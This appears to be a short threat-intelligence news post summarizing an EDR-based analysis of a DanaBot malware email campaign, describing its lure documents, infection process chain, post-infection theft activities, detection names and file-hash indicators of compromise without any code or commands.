Recent email campaigns distribute DanaBot malware through two document types: those exploiting equation editor and those with external links. Attackers send emails disguised as job applications with a malicious Word document attached. However, the document itself doesn’t contain malware; it tricks the user into clicking an external link, initiating the DanaBot infection process.
DanaBot Malware
The Endpoint Detection and Response (EDR) system flagged a suspicious process chain initiated when a user clicked on a malicious email attachment.
The attachment, a Word document (.docx), triggered a sequence involving Outlook (outlook.exe), Word (winword.exe), Command Prompt (cmd.exe), PowerShell (powershell.exe), and a potentially malicious executable (iu4t4.exe) using rundll32.exe.
The malicious macro document (w1p4nx.dotm) executes encoded CMD commands, decoded using the macro code, including a PowerShell script downloading DanaBot malware (iu4t4.exe) from a command-and-control server (C2).
The Endpoint Detection and Response (EDR) system verifies the decoded commands and the creation of the DanaBot executable in the C:\Users\Public directory via PowerShell.
ASEC’s analysis of the EDR diagrams uncovers DanaBot’s (iu4t4.exe) self-injection technique, utilizing rundll32.exe to execute shell32.dll’s functionalities. This allows DanaBot to operate under disguise, bypass detection, and establish persistence.
EDR data highlights the malware’s post-infection activities, including screenshot capture, sensitive information theft, and pilfering browser credentials, enabling system compromise without constant communication with the command and control server. An incident involving potential malware infection was detected, with observed scripting and malware execution attempts (M10747, M10459). Downloaded files (DOCX, DOTM) were flagged as suspicious (Downloader/XML.External, Downloader/DOC.Generic.S2503).
Further analysis uncovered a Trojan (Trojan/Win.DANABOT.C5608053) along with associated IOCs (0bb0ae135c2f4ec39e93dcf66027604d.DOCX, 28fd189dc70f5bab649e8a267407ae85.DOTM, e29e4a6c31bd79d90ab2b89f57075312.exe).
Leave A Comment